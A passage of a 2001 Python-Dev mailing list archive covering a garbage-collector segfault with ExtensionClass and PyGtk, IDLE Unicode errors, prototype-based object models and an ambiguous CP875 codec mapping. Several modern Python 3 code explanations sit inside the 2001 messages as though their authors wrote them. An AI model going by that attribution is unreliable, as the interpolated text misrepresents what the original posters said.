set using ExtensionClasses.  Any ideas how I should approach the problem?  I
don't know either piece of code at all and the code that generates the
segfault isn't particularly small, not to mention that it uses the bleeding
edge Gtk stuff (which I doubt anyone on this list will have installed) and a
version of ExtensionClass patched by James Henstridge, the PyGtk author.

Here's what I know:

    1. Disabling gc gets rid of the segfault
    2. I only see the problem with importing a specific module that
       subclasses the GtkTextView widget from the Python command line.  If I
       run it as a script from the shell prompt, I get no segfault.
    3. If I first import the gtk module, then import my module, I get no
       segfault. 
    4. Most changes I make to the module causing the problem cause the
       problem to disappear.

All told, all this really tells me is I'm probably dealing with a
malloc/free problem of some sort.
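Observation 1 can be reproduced systematically with a small helper that imports a module with the cyclic collector switched off and then restores the previous state. The helper name is hypothetical. Note that a crash disappearing under it only shows that the collector is involved. The collector may just be the first code to walk a corrupted object, as the visit_decref/tupletraverse frames below suggest.

```python
import gc
import importlib


def import_with_gc_disabled(module_name):
    """Import a module with the cyclic collector off, then restore the
    previous collector state even if the import fails."""
    was_enabled = gc.isenabled()
    gc.disable()
    try:
        return importlib.import_module(module_name)
    finally:
        if was_enabled:
            gc.enable()
```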

Neil and/or Jim (and/or anyone else willing to look into this problem), I
can give you access to my development machine via ssh if you think that
would help debug the problem.

Skip

#0  0x0807163d in visit_decref (op=0x4034ece0, data=0x0)
    at ../Modules/gcmodule.c:153
#1  0x08096dc6 in tupletraverse (o=0x8290d6c, visit=0x8071630 <visit_decref>, 
    arg=0x0) at ../Objects/tupleobject.c:366
#2  0x08071672 in subtract_refs (containers=0x80b8ac0)
    at ../Modules/gcmodule.c:167
#3  0x08071abf in collect (young=0x80b8ac0, old=0x80b8acc)
    at ../Modules/gcmodule.c:379
#4  0x08071d53 in collect_generations () at ../Modules/gcmodule.c:484
#5  0x08071db7 in _PyGC_Insert (op=0x82ea9c4) at ../Modules/gcmodule.c:507
#6  0x0808d743 in PyDict_New () at ../Objects/dictobject.c:149
#7  0x401ef977 in getBaseDictionary (type=0x4034d320) at ExtensionClass.c:1244
#8  0x401f0979 in initializeBaseExtensionClass (self=0x4034d320)
    at ExtensionClass.c:1485
#9  0x401f6774 in export_subclassed_type (dict=0x82d33a4, 
    name=0x40337c55 "GtkTreeViewColumn", typ=0x4034d320, bases=0x82ea9a4)
    at ExtensionClass.c:3410
#10 0x4022a360 in pygobject_register_class (dict=0x82d33a4, 
    class_name=0x40337c55 "GtkTreeViewColumn", 
    get_type=0x404c4080 <gtk_tree_view_column_get_type>, ec=0x4034d320, 
    bases=0x82ea9a4) at gobjectmodule.c:202
#11 0x4032fd7e in pygtk_register_classes (d=0x82d33a4) at gtk.c:30071
#12 0x402f0ed0 in init_gtk () at gtkmodule.c:98
#13 0x0806927c in _PyImport_LoadDynamicModule (name=0xbfffcd00 "gtk._gtk", 
    pathname=0xbfffc870 "/usr/local/lib/python2.1/site-packages/gtk/_gtkmodule.so", fp=0x82ab6e0) at ../Python/importdl.c:52
#14 0x08067780 in load_module (name=0xbfffcd00 "gtk._gtk", fp=0x82ab6e0, 
    buf=0xbfffc870 "/usr/local/lib/python2.1/site-packages/gtk/_gtkmodule.so", 
    type=3) at ../Python/import.c:1296
#15 0x080683eb in import_submodule (mod=0x82963bc, subname=0xbfffcd04 "_gtk", 
    fullname=0xbfffcd00 "gtk._gtk") at ../Python/import.c:1815
#16 0x08067f6a in load_next (mod=0x82963bc, altmod=0x80bf3cc, 
    p_name=0xbfffd130, buf=0xbfffcd00 "gtk._gtk", p_buflen=0xbfffccfc)
    at ../Python/import.c:1671
#17 0x08067bcc in import_module_ex (name=0x0, globals=0x8295f1c, 
    locals=0x8295f1c, fromlist=0x8296864) at ../Python/import.c:1522
#18 0x08067d23 in PyImport_ImportModuleEx (name=0x8290aac "_gtk", 
    globals=0x8295f1c, locals=0x8295f1c, fromlist=0x8296864)
    at ../Python/import.c:1563
#19 0x0809f4b9 in builtin___import__ (self=0x0, args=0x8291124)
    at ../Python/bltinmodule.c:31
#20 0x080591e3 in call_cfunction (func=0x80cdcf0, arg=0x8291124, kw=0x0)
    at ../Python/ceval.c:2838
#21 0x080590d5 in call_object (func=0x80cdcf0, arg=0x8291124, kw=0x0)
    at ../Python/ceval.c:2801
#22 0x08058f9c in PyEval_CallObjectWithKeywords (func=0x80cdcf0, 
    arg=0x8291124, kw=0x0) at ../Python/ceval.c:2734
#23 0x08057764 in eval_code2 (co=0x82910d0, globals=0x8295f1c, 
    locals=0x8295f1c, args=0x0, argcount=0, kws=0x0, kwcount=0, defs=0x0, 
    defcount=0, closure=0x0) at ../Python/ceval.c:1820
#24 0x08055085 in PyEval_EvalCode (co=0x82910d0, globals=0x8295f1c, 
    locals=0x8295f1c) at ../Python/ceval.c:346
#25 0x08066a86 in PyImport_ExecCodeModuleEx (name=0xbfffe0b0 "gtk", 
    co=0x82910d0, 
    pathname=0xbfffd340 "/usr/local/lib/python2.1/site-packages/gtk/__init__.pyc") at ../Python/import.c:490
#26 0x08066fc7 in load_source_module (name=0xbfffe0b0 "gtk", 
    pathname=0xbfffd7b0 "/usr/local/lib/python2.1/site-packages/gtk/__init__.py", fp=0x80d1a20) at ../Python/import.c:754
#27 0x0806775e in load_module (name=0xbfffe0b0 "gtk", fp=0x80d1a20, 
    buf=0xbfffd7b0 "/usr/local/lib/python2.1/site-packages/gtk/__init__.py", 
    type=1) at ../Python/import.c:1287
#28 0x08067129 in load_package (name=0xbfffe0b0 "gtk", 
    pathname=0xbfffdc20 "/usr/local/lib/python2.1/site-packages/gtk")
    at ../Python/import.c:811
#29 0x08067791 in load_module (name=0xbfffe0b0 "gtk", fp=0x0, 
    buf=0xbfffdc20 "/usr/local/lib/python2.1/site-packages/gtk", type=5)
    at ../Python/import.c:1310
#30 0x080683eb in import_submodule (mod=0x80bf3cc, subname=0xbfffe0b0 "gtk", 
    fullname=0xbfffe0b0 "gtk") at ../Python/import.c:1815
#31 0x08067f6a in load_next (mod=0x80bf3cc, altmod=0x80bf3cc, 
    p_name=0xbfffe4e0, buf=0xbfffe0b0 "gtk", p_buflen=0xbfffe0ac)
    at ../Python/import.c:1671
#32 0x08067bcc in import_module_ex (name=0x0, globals=0x828c3fc, 
    locals=0x828c3fc, fromlist=0x80bf3cc) at ../Python/import.c:1522
#33 0x08067d23 in PyImport_ImportModuleEx (name=0x811556c "gtk", 
    globals=0x828c3fc, locals=0x828c3fc, fromlist=0x80bf3cc)
    at ../Python/import.c:1563
#34 0x0809f4b9 in builtin___import__ (self=0x0, args=0x829651c)
    at ../Python/bltinmodule.c:31
#35 0x080591e3 in call_cfunction (func=0x80cdcf0, arg=0x829651c, kw=0x0)
    at ../Python/ceval.c:2838
#36 0x080590d5 in call_object (func=0x80cdcf0, arg=0x829651c, kw=0x0)
    at ../Python/ceval.c:2801
#37 0x08058f9c in PyEval_CallObjectWithKeywords (func=0x80cdcf0, 
    arg=0x829651c, kw=0x0) at ../Python/ceval.c:2734
#38 0x08057764 in eval_code2 (co=0x82968b8, globals=0x828c3fc, 
    locals=0x828c3fc, args=0x0, argcount=0, kws=0x0, kwcount=0, defs=0x0, 
    defcount=0, closure=0x0) at ../Python/ceval.c:1820
#39 0x08055085 in PyEval_EvalCode (co=0x82968b8, globals=0x828c3fc, 
    locals=0x828c3fc) at ../Python/ceval.c:346
#40 0x08066a86 in PyImport_ExecCodeModuleEx (name=0xbfffeff0 "seg", 
    co=0x82968b8, pathname=0xbfffe6f0 "seg.pyc") at ../Python/import.c:490
#41 0x08066fc7 in load_source_module (name=0xbfffeff0 "seg", 
    pathname=0xbfffeb60 "seg.py", fp=0x820cd60) at ../Python/import.c:754
#42 0x0806775e in load_module (name=0xbfffeff0 "seg", fp=0x820cd60, 
    buf=0xbfffeb60 "seg.py", type=1) at ../Python/import.c:1287
#43 0x080683eb in import_submodule (mod=0x80bf3cc, subname=0xbfffeff0 "seg", 
    fullname=0xbfffeff0 "seg") at ../Python/import.c:1815
#44 0x08067f6a in load_next (mod=0x80bf3cc, altmod=0x80bf3cc, 
    p_name=0xbffff420, buf=0xbfffeff0 "seg", p_buflen=0xbfffefec)
    at ../Python/import.c:1671
#45 0x08067bcc in import_module_ex (name=0x0, globals=0x80d21e4, 
    locals=0x80d21e4, fromlist=0x80bf3cc) at ../Python/import.c:1522
#46 0x08067d23 in PyImport_ImportModuleEx (name=0x828c61c "seg", 
    globals=0x80d21e4, locals=0x80d21e4, fromlist=0x80bf3cc)
    at ../Python/import.c:1563
#47 0x0809f4b9 in builtin___import__ (self=0x0, args=0x80e7bc4)
    at ../Python/bltinmodule.c:31
#48 0x080591e3 in call_cfunction (func=0x80cdcf0, arg=0x80e7bc4, kw=0x0)
    at ../Python/ceval.c:2838
#49 0x080590d5 in call_object (func=0x80cdcf0, arg=0x80e7bc4, kw=0x0)
    at ../Python/ceval.c:2801
#50 0x08058f9c in PyEval_CallObjectWithKeywords (func=0x80cdcf0, 
    arg=0x80e7bc4, kw=0x0) at ../Python/ceval.c:2734
#51 0x08057764 in eval_code2 (co=0x8115908, globals=0x80d21e4, 
    locals=0x80d21e4, args=0x0, argcount=0, kws=0x0, kwcount=0, defs=0x0, 
    defcount=0, closure=0x0) at ../Python/ceval.c:1820
#52 0x08055085 in PyEval_EvalCode (co=0x8115908, globals=0x80d21e4, 
    locals=0x80d21e4) at ../Python/ceval.c:346
#53 0x0806da1f in run_node (n=0x8115558, filename=0x80a496d "<stdin>", 
    globals=0x80d21e4, locals=0x80d21e4, flags=0xbffff708)
    at ../Python/pythonrun.c:1045
#54 0x0806cb2a in PyRun_InteractiveOneFlags (fp=0x4018e620, 
    filename=0x80a496d "<stdin>", flags=0xbffff708)
    at ../Python/pythonrun.c:570
#55 0x0806c98c in PyRun_InteractiveLoopFlags (fp=0x4018e620, 
    filename=0x80a496d "<stdin>", flags=0xbffff708)
    at ../Python/pythonrun.c:510
#56 0x0806c85a in PyRun_AnyFileExFlags (fp=0x4018e620, 
    filename=0x80a496d "<stdin>", closeit=0, flags=0xbffff708)
    at ../Python/pythonrun.c:473
#57 0x08051fae in Py_Main (argc=1, argv=0xbffff78c) at ../Modules/main.c:320
#58 0x400831f0 in __libc_start_main () from /lib/libc.so.6


From guido at digicool.com  Fri May 11 23:49:00 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 11 May 2001 16:49:00 -0500
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: Your message of "Fri, 11 May 2001 15:41:30 EST."
             <15100.20090.573866.569667@beluga.mojam.com> 
References: <15100.20090.573866.569667@beluga.mojam.com> 
Message-ID: <200105112149.QAA07533@cj20424-a.reston1.va.home.com>

> Has anyone investigated interactions between ExtensionClass objects and GC?
> I've encountered segfaults with 2.1 in certain situations when using the
> latest PyGtk stuff.  The gdb traceback (appended) sort of suggests the two
> intersect somewhere.  PyGtk provides a Python interface to the Gtk widget
> set using ExtensionClasses.  Any ideas how I should approach the problem?  I
> don't know either piece of code at all and the code that generates the
> segfault isn't particularly small, not to mention which it uses the bleeding
> edge Gtk stuff (which I doubt anyone on this list will have installed) and a
> version of ExtensionClass patched by James Henstridge, the PyGtk author.
> 
> Here's what I know:
> 
>     1. Disabling gc gets rid of the segfault
>     2. I only see the problem with importing a specific module that
>        subclasses the GtkTextView widget from the Python command line.  If I
>        run it as a script from the shell prompt, I get no segfault.
>     3. If I first import the gtk module, then import my module, I get no
>        segfault. 
>     4. Most changes I make to the module causing the problem cause the
>        problem to disappear.
> 
> All told, all this really tells me is I'm probably dealing with a
> malloc/free problem of some sort.
> 
> Neil and/or Jim (and/or anyone else willing to look into this problem), I
> can give you access to my development machine via ssh if you think that
> would help debug the problem.

AFAIK, the latest version of Zope (which uses ExtensionClass
extensively if not exclusively :-) works fine with Python 2.1.

This suggests pointing a finger towards the PyGtk code... :-(

--Guido van Rossum (home page: http://www.python.org/~guido/)


From loewis at informatik.hu-berlin.de  Fri May 11 22:53:55 2001
From: loewis at informatik.hu-berlin.de (Martin von Loewis)
Date: Fri, 11 May 2001 22:53:55 +0200 (MEST)
Subject: [Python-Dev] IDLE and non-ASCII characters
Message-ID: <200105112053.WAA15657@pandora.informatik.hu-berlin.de>

Thanks to a bug report I got, I noticed for the first time that you
cannot enter non-ASCII characters in IDLE anymore. Eg. at the shell
prompt, you may get

>>> s='??'
UnicodeError: ASCII encoding error: ordinal not in range(128)

Likewise, when trying to save a file that has non-ASCII characters,
you get a traceback.

Now, I think I understand all the causes of the problem (Tkinter
returning Unicode objects, and so on). However, I'm curious whether
anybody has proposals on how to deal with it.

For saving text files, if Python had an encoding directive, things
might be easier :-) For the shell prompt, I've no idea how to solve
this best.

So any suggestions are welcome.

Regards,
Martin


From fredrik at pythonware.com  Sat May 12 00:18:27 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Sat, 12 May 2001 00:18:27 +0200
Subject: [Python-Dev] status of pre?
References: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com>  <200105111847.NAA05835@cj20424-a.reston1.va.home.com>
Message-ID: <00ca01c0da68$4fc66570$e46940d5@hagrid>

guido wrote:
> 
> We could put a warning on using pre or pcre in 2.2, and remove it in
> 2.3, hoping that /F fixes the recursion limit problems in the mean
> time (weren't those related to the backtracking implementation)?

2.2 is to be released in october, right?  I'm sure I could shake
out the remaining bugs in my "stackless SRE" patch until then...

Cheers /F


From fredrik at effbot.org  Sat May 12 01:03:10 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Sat, 12 May 2001 01:03:10 +0200
Subject: [Python-Dev] Hats off to them!
Message-ID: <014a01c0da6e$93578ca0$e46940d5@hagrid>

http://www.theregister.co.uk/content/4/18909.html

    "Microsoft Altair BASIC legend talks about Linux, CPRM and
    that very frightening photo

    ...

    His other passion, he tells us, is Python. 

    "Hats off to them. It's an extremely well designed language. It's
    object orientated from the get-go. They've really succeeded there,"
    he says, and commends it as the ideal teaching language. That
    used to be BASIC, of course"

    ...

(no, it's not Bill)

Cheers /F


From fredrik at effbot.org  Sat May 12 01:14:47 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Sat, 12 May 2001 01:14:47 +0200
Subject: [Python-Dev] Hats off to them!
References: <014a01c0da6e$93578ca0$e46940d5@hagrid>
Message-ID: <015001c0da70$3078cf70$e46940d5@hagrid>

>     "Hats off to them. It's an extremely well designed language. It's
>     object orientated from the get-go. They've really succeeded there,"
>     he says, and commends it as the ideal teaching language. That
>     used to be BASIC, of course"

reading on, I'm not sure why BASIC ever was the ideal teaching
language:

http://www.americanhistory.si.edu/csr/comphist/gates.htm#tc11

    "One of the nice things about this BASIC is it has this so called
    direct mode. So you can PRINT 2 + 2. It prints the square root
    of ten"

Cheers /F


From sdm7g at Virginia.EDU  Sat May 12 04:43:31 2001
From: sdm7g at Virginia.EDU (Steven D. Majewski)
Date: Fri, 11 May 2001 22:43:31 -0400 (EDT)
Subject: [Python-Dev] Type/class
In-Reply-To: <016d01c0da30$a99a9720$e000a8c0@thomasnotebook>
Message-ID: <Pine.NXT.4.21.0105112009300.248-100000@localhost.virginia.edu>


On Fri, 11 May 2001, Thomas Heller wrote:

> I never looked at Self or other prototype based systems.
> Is it really true that prototypes are a lot simpler than
> metaclasses, but on the other hand more powerful?

Definitely simpler: No classes, No metaclasses, only objects.

Ignore for now the fact that a limited set of classes are 
handier for a statically type checked language and just 
consider dynamic languages, which is their proper domain.      

Prototype semantics basically subsume class semantics.
Any object can be an exemplar and fill the role of a class:
if it is used ONLY as a template and holder of shared
behaviour, it behaves just like a class.

[One of the Self papers -- one which I haven't read -- is
entitled "Self includes Smalltalk"  -- and is, I believe,
a demonstration that Smalltalk is sort of a subset of Self.]


But you can also have finer grain classification and you 
can have object inheritance. ( This is handy in XlispStat,
which is oriented towards statistics and analysis: you can
have derived objects, for example different subsamples of
the same population, or in my app, different energy spectra,
along with derived and processed spectra with special rules
for treatment: e.g. linear filtered spectra have a filter
function or kernel, and if they are fit against reference
spectra, they need to be fit against references that have 
had the same filter applied to them -- if none available
create one from unfiltered samples -- and maybe a whole
chain of derived data. In a class based system, you would
have to manually maintain a separate linked list of objects,
but in a prototype system they can all be cloned from their
parent objects. )   

The other plus for things like exploratory statistics is that
you don't have to design a class hierarchy ahead of time -- 
it's more concrete and less abstract than a class-based system.

Prototypes can also solve some of the sort of problems that
Jim Fulton's acquisition framework in Zope is designed to 
handle. (But it's been a while since I read that paper and
I haven't used it, so I'm relying on my memory of thinking
"Yeah -- that would be simpler with prototypes" ) 

You definitely don't have to worry about simulating the 
Prototype Pattern. (I've seen GUI systems in C++ that go
thru a lot of code to add prototype-like behavior to C++ classes.) 


But -- unless I can figure a useful way to use it under the
covers, it's not really a topic for python-dev.  


> The 'brain exploding properties' of metaclasses are IMO
> only there because my brain cannot think easily in too
> many recursion steps...

It's just like spelling bananana -- the problem is to know
when to stop! ;-)


-- Steve Majewski


From tim_one at email.msn.com  Sat May 12 13:28:27 2001
From: tim_one at email.msn.com (Tim Peters)
Date: Sat, 12 May 2001 07:28:27 -0400
Subject: [Python-Dev] Ill-defined encoding for CP875?
Message-ID: <LNBBLJKPBEHFEDALKOLCOELPKBAA.tim_one@email.msn.com>

I have a way to make dict lookup a teensy bit cheaper(*) that significantly
reduces the number of collisions (which is much more valuable).

This caused a number of std tests to fail, because they were implicitly
relying on the order in which a dict's entries are materialized via .keys()
or .items().

Most of these were easy enough to fix.  The last failure remaining is
test_unicode, and I don't know how to fix it.  It's dying here:

    try:
        verify(unicode(s,encoding).encode(encoding) == s)
    except TestFailed:
        print '*** codec "%s" failed round-trip' % encoding
    except ValueError,why:
        print '*** codec for "%s" failed: %s' % (encoding, why)

when encoding == "cp875".  There's a bogus problem you have to worm around
first:  test_unicode neglected to import TestFailed, so it actually dies
with NameError while trying the "except TestFailed" clause after verify()
raises TestFailed.  Once that's repaired, it's complaining about failing the
round-trip encoding.
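For comparison, here is a minimal Python 3 sketch of the same round-trip check with the missing name supplied. `TestFailed` and `verify` are defined locally as stand-ins for the regression-suite helpers (an assumption; the real ones live in the test support module), and `check_round_trip` is a hypothetical helper name.

```python
class TestFailed(Exception):
    """Local stand-in for the regression suite's TestFailed exception."""


def verify(condition, reason="test failed"):
    # Raise TestFailed, mirroring how the test helper signals a failed check.
    if not condition:
        raise TestFailed(reason)


def check_round_trip(data, encoding):
    """Return None if data survives decode+encode, else an error message."""
    try:
        verify(data.decode(encoding).encode(encoding) == data)
    except TestFailed:
        # Reachable only because TestFailed is actually in scope here.
        return '*** codec "%s" failed round-trip' % encoding
    except ValueError as why:
        # UnicodeError subclasses ValueError, so codec errors land here.
        return '*** codec for "%s" failed: %s' % (encoding, why)
    return None
```

For example, `check_round_trip(bytes(range(128)), "latin-1")` returns None, while `check_round_trip(b"abc", "utf-8-sig")` reports a round-trip failure because that codec adds a BOM on encoding.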

The original character in s it's griping about is "?" (0x3f).  cp875.py has
this entry in its decoding_map dict:

	0x003f: 0x001a,	# SUBSTITUTE

But 0x1a is not a *unique* value in this dict.  There's also

	0x00dc: 0x001a,	# SUBSTITUTE
	0x00e1: 0x001a,	# SUBSTITUTE
	0x00ec: 0x001a,	# SUBSTITUTE
	0x00ed: 0x001a,	# SUBSTITUTE
	0x00fc: 0x001a,	# SUBSTITUTE
	0x00fd: 0x001a,	# SUBSTITUTE

Therefore what appears associated with 0x1a in the derived encoding_map
dict:

encoding_map = {}
for k,v in decoding_map.items():
    encoding_map[v] = k

may end up being any of the 7 decoding_map keys that map to 0x1a.  It just
so happened to map back to 0x3f before, but to 0xfd after the dict change,
so "?" doesn't survive the round trip anymore.

My knowledge of encoding internals is exceeded only by my mastery of file
URLs under Windows <wink>, so I could sure use some help getting this
repaired.  I'd really like to check in the dict improvement (+ test
repairs), but won't do it so long as it makes a std test fail.  If, e.g.,
you're *relying* on "the first" of a set of ambiguous reverse mappings
winning the game, then iterating over decoding_map.items() in reverse sorted
order would do the trick reliably.  But I don't know whether the ambiguity
in cp875 is a bug or an undocumented feature ...
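A minimal sketch of the reverse-sorted idea, assuming the goal is for the smallest byte in each many-to-one group to win. The `decoding_map` below is only an excerpt (the seven SUBSTITUTE entries quoted above plus the EBCDIC space, 0x40 -> U+0020), and `invert_map` is a hypothetical helper name.

```python
# Excerpt of a cp875-style decoding map: EBCDIC byte -> Unicode ordinal.
decoding_map = {
    0x40: 0x0020,  # SPACE
    0x3f: 0x001a,  # SUBSTITUTE
    0xdc: 0x001a,  # SUBSTITUTE
    0xe1: 0x001a,  # SUBSTITUTE
    0xec: 0x001a,  # SUBSTITUTE
    0xed: 0x001a,  # SUBSTITUTE
    0xfc: 0x001a,  # SUBSTITUTE
    0xfd: 0x001a,  # SUBSTITUTE
}


def invert_map(decoding_map):
    """Build an encoding map whose result does not depend on dict order."""
    encoding_map = {}
    # Visit keys from largest to smallest; later assignments overwrite
    # earlier ones, so the smallest key in each group is stored last.
    for k, v in sorted(decoding_map.items(), reverse=True):
        encoding_map[v] = k
    return encoding_map


encoding_map = invert_map(decoding_map)
print(hex(encoding_map[0x1a]))  # prints 0x3f
```

Because the items are sorted before inversion, the result is the same whatever order the dict happens to store its entries in.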

7-bit-ascii-looks-better-every-day<wink>-ly y'rs  - tim


(*) Simply by taking the damn "~" off "~hash" -- I explained quite a while
ago why that can lead to a weak form of clustering "in theory", and
instrumenting the dict lookup code confirmed that it does hurt in real life.


From guido at digicool.com  Sat May 12 14:28:23 2001
From: guido at digicool.com (Guido van Rossum)
Date: Sat, 12 May 2001 07:28:23 -0500
Subject: [Python-Dev] prototypes (was: Type/class)
In-Reply-To: Your message of "Fri, 11 May 2001 22:43:31 -0400."
             <Pine.NXT.4.21.0105112009300.248-100000@localhost.virginia.edu> 
References: <Pine.NXT.4.21.0105112009300.248-100000@localhost.virginia.edu> 
Message-ID: <200105121228.HAA08988@cj20424-a.reston1.va.home.com>

Do prototype-based languages have the equivalent of multiple
inheritance?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim_one at email.msn.com  Sat May 12 14:16:33 2001
From: tim_one at email.msn.com (Tim Peters)
Date: Sat, 12 May 2001 08:16:33 -0400
Subject: [Python-Dev] prototypes (was: Type/class)
In-Reply-To: <200105121228.HAA08988@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEMBKBAA.tim_one@email.msn.com>

[Guido]
> Do prototype-based languages have the equivalent of multiple
> inheritance?

Just as for class-based languages, whether a prototype-based language
supports an MI workalike varies by language.  In a class-based language with
MI, a class can have multiple base classes; in a prototype-based language
with an MI workalike, an object can have multiple prototype objects.  The
same kinds of ambiguities can arise, and the same kinds of resolution
strategies are applicable (imposed linearization; user-supplied
qualification; user-supplied renaming; guessing <0.7 wink>).
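As a rough illustration of an object with several prototypes, here is a hypothetical `Proto` class in Python whose missing attributes are looked up in a list of parent objects, searched depth-first and left to right. That order is just one possible imposed linearization, chosen for simplicity and not taken from any particular prototype language; "methods" are plain callables stored as slots, so they do not receive the object.

```python
class Proto:
    """An object whose missing attributes are looked up in its parents."""

    def __init__(self, *parents, **slots):
        self._parents = list(parents)
        self.__dict__.update(slots)

    def __getattr__(self, name):
        # Called only when normal lookup fails: ask each parent in turn,
        # depth-first and left to right; the first parent that knows wins.
        for parent in self._parents:
            try:
                return getattr(parent, name)
            except AttributeError:
                pass
        raise AttributeError(name)


walker = Proto(legs=2, move=lambda: "walk")
swimmer = Proto(fins=True, move=lambda: "swim")
duck = Proto(walker, swimmer, name="duck")

print(duck.legs, duck.fins)  # 2 True: slots found in different prototypes
print(duck.move())           # walk: the ambiguity is resolved by order
```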

JavaScript is the best-known prototype language that does not support
multiple prototypes per object.  A very readable intro to its object model
is here:

  http://developer.netscape.com/docs/manuals/communicator/jsobj/jsobj.pdf

It's interesting because, near the end, the author explores a bit how far
you can get *trying* to fake MI in JS.  The answer is "farther than you
might think", but not all the way.


From fredrik at pythonware.com  Sat May 12 14:25:43 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Sat, 12 May 2001 14:25:43 +0200
Subject: [Python-Dev] Ill-defined encoding for CP875?
References: <LNBBLJKPBEHFEDALKOLCOELPKBAA.tim_one@email.msn.com>
Message-ID: <02e501c0dade$ab7f1080$e46940d5@hagrid>

tim wrote:
> If, e.g., you're *relying* on "the first" of a set of ambiguous reverse mappings
> winning the game, then iterating over decoding_map.items() in reverse sorted
> order would do the trick reliably.

reverse sorting makes sense to me.  but the cp-files appear to be
machine generated, so patching that python file won't help.

> But I don't know whether the ambiguity in cp875 is a bug or an undocumented
> feature ...

a truly future-proof solution would be to specify exactly how to resolve
every many-to-one mapping, for every font having that problem.  but
sorting them is clearly better than relying on implementation-dependent
behaviour...

(is Jython using exactly the same hashing and dictionary algorithms as
CPython?  or does it work by accident also under Jython?)

Cheers /F


From nas at python.ca  Sat May 12 16:28:54 2001
From: nas at python.ca (Neil Schemenauer)
Date: Sat, 12 May 2001 07:28:54 -0700
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: <15100.20090.573866.569667@beluga.mojam.com>; from skip@pobox.com on Fri, May 11, 2001 at 03:41:30PM -0500
References: <15100.20090.573866.569667@beluga.mojam.com>
Message-ID: <20010512072854.A4271@glacier.fnational.com>

skip at pobox.com wrote:
> 
> Has anyone investigated interactions between ExtensionClass objects and GC?
> I've encountered segfaults with 2.1 in certain situations when using the
> latest PyGtk stuff.

Do any of the PyGtk objects define the GC type flag?

The GC is fairly good at exposing memory management bugs that
otherwise go unnoticed.  If you're using glibc you can try setting
the MALLOC_CHECK_ environment variable to 2.  If you've got lots
of memory you could also try running your program under Electric
Fence.  Finally, you might try compiling with Py_DEBUG
defined.
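One way to try this from Python is to re-run the failing import in a child interpreter with `MALLOC_CHECK_=2` in its environment, optionally with the collector switched off to confirm the "disabling gc gets rid of the segfault" observation. This is a sketch: `run_import_test` is a hypothetical helper, `MALLOC_CHECK_` only has an effect with glibc's malloc (recent glibc versions may also need the malloc debugging library preloaded), and a negative return code means the child was killed by that signal on POSIX.

```python
import os
import subprocess
import sys


def run_import_test(module_code, malloc_check="2", disable_gc=False):
    """Run module_code in a fresh interpreter and return its exit status."""
    env = dict(os.environ, MALLOC_CHECK_=malloc_check)
    if disable_gc:
        # Turn the cyclic collector off before the suspect code runs.
        module_code = "import gc; gc.disable()\n" + module_code
    proc = subprocess.run([sys.executable, "-c", module_code], env=env)
    # On POSIX, -11 would mean the child died with SIGSEGV.
    return proc.returncode
```

For example, compare `run_import_test("import seg")` with `run_import_test("import seg", disable_gc=True)`, where `import seg` stands in for whatever import crashes.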

> Neil and/or Jim (and/or anyone else willing to look into this problem), I
> can give you access to my development machine via ssh if you think that
> would help debug the problem.

I'd be willing to take a look (the chances of me reproducing it
don't look good).  A public RSA key is attached.

  Neil

1024 35 137239219965727437168672191918903379374375693016714793361229775412659825927393161529979393960653570460772264478344617383839228413657344788196731901259658832080205387752175259876861415566787275112151657197829855666024930817293398722707127849748769398037860296053992448539154897117015626552934877126704135564999 nas


From sdm7g at Virginia.EDU  Sat May 12 17:07:06 2001
From: sdm7g at Virginia.EDU (Steven D. Majewski)
Date: Sat, 12 May 2001 11:07:06 -0400 (EDT)
Subject: [Python-Dev] prototypes (was: Type/class)
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEMBKBAA.tim_one@email.msn.com>
Message-ID: <Pine.NXT.4.21.0105121011450.241-100000@localhost>


[Guido]
> Do prototype-based languages have the equivalent of multiple
> inheritance?
 
Yeah ... What Tim said... 

Also: There are two basic implementation models:

Delegation  [a.k.a. "Lifetime sharing", cloning]
  sort of like Python -- if you don't know how to handle it "ask" 
  a parent object. ( "ask" in quotes, because I've recently been
  in a long argument about whether Objective-C & Smalltalk can
  really be said to "send messages", or if it's "just" dynamic
  lookup and function application! ) 

Extension  [a.k.a. "Birth sharing", copying, concatenation ]
  more like how I imagine C++ vtables are built -- the Python 
  equivalent would be like merging all of the class __dict__'s
  together with name-clash priority going to the nearest
  relative. 

( "Life Sharing" vs. "Birth Sharing" -- is a change in the
  base class after object creation inherited by the object? )
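The two models, and the "life vs. birth sharing" question, can be seen in a small Python sketch. `Delegating` looks up missing slots in its parent at access time; `Extending` copies the parent's slots when it is created. Both class names are hypothetical, and each object has a single parent for brevity.

```python
class Delegating:
    """Delegation ("life sharing"): ask the parent whenever a slot is missing."""

    def __init__(self, parent=None, **slots):
        self.parent = parent
        self.__dict__.update(slots)

    def __getattr__(self, name):
        # Only reached when the slot is not on this object itself.
        if self.parent is None:
            raise AttributeError(name)
        return getattr(self.parent, name)


class Extending:
    """Extension ("birth sharing"): copy the parent's slots at creation."""

    def __init__(self, parent=None, **slots):
        if parent is not None:
            self.__dict__.update(vars(parent))  # snapshot of the parent
        self.__dict__.update(slots)             # own slots win name clashes


base = Delegating(color="red")
child = Delegating(base)
base.color = "blue"
print(child.color)   # blue: a later change to the parent is visible

base2 = Extending(color="red")
child2 = Extending(base2)
base2.color = "blue"
print(child2.color)  # red: the child kept what it copied at birth
```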

 I think most multiple-inheritance languages use delegation, but
there's no reason it wouldn't work with extension. The difference is
that with extension, everything has to get resolved at object creation. 
 Extension could be made more flexible if on creation, you could 
not only add new methods, but rearrange and control the extension
process ( sort of like "from xxx import yyy; from aaa import bbb" ).
 I would think one could use delegation by default and provide 
an extension mechanism as an optimization, but I don't know if 
there's any system that does this. 

 If it follows the paradigm, a prototype system doesn't have an 
'isa' or '__class__' slot -- only a (linked) list of parent objects.
But if you were simulating class orientation, one would add 
an 'isa' slot for the immediate prototype, and probably enforce
some restrictions on the prototype objects that were playing the
role of class objects. 

 "If it follows the paradigm" -- as in OO in general, there are
several flavors and implementations, and some may be hybrid
systems. 
  Self is the language most widely known as a prototype-based 
language. Some others: NewtonScript (from Apple's late lamented
Newton palmtop), Kevo (a Forth-based OO language), Cardelli's
